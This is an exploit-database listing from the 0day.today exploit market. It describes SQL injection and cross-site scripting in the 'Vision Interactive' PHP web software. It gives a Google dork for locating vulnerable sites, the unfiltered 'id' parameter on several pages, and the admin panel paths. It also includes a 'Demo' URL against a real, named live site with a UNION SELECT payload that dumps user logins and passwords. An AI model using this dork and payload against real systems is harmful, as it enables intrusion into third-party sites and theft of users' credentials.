[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vision Interactive - SQL Injection / Cross-Site Scripting Vulnerabilities

Author
X-Line
Risk
[
Security Risk High
]
0day-ID
0day-ID-21867
Category
web applications
Date add
06-02-2014
Platform
php
# Exploit Title: Vision Interactive - SQL Injection and Cross-Site Scripting 
# Google Dork: "Powered by Vision Interactive"
# Date: 04/02/2014
# ontact: FB /7h38357
# Exploit Author: X-Line ( Empire North )
# Vendor Homepage: www.visioninteractive.ma
# Software Link: www.visioninteractive.ma
# Tested on: Windows, Linux
 
Vulnerable code infile fiche.php produits.php apeldetail.php *.php
Description: The $_GET-Parameter 'id' is not filtered and so an attacker
             can inject some malicious mysql-code.
 
Example:

    SQL Injection & Cross-Site Scripting

	PoC:
http://localhost/fiche.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/produits.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/apeldetail.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/fiche_actualite.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/reservation.php?id=[SQL INJECTION] and [Cross-Site Scripting]


Panel 
/admin
/auth.php

Demo:
http://www.inrh.ma/apeldetail.php?id=-1870 union select 1,2,3,4,5,6,7,group_concat(us_login,0x3a,us_pass),9,10,11,12,13,14 from utilisateurs


#
#
#Greetz to lWalida & Walid & Myself

#  0day.today [2024-12-24]  #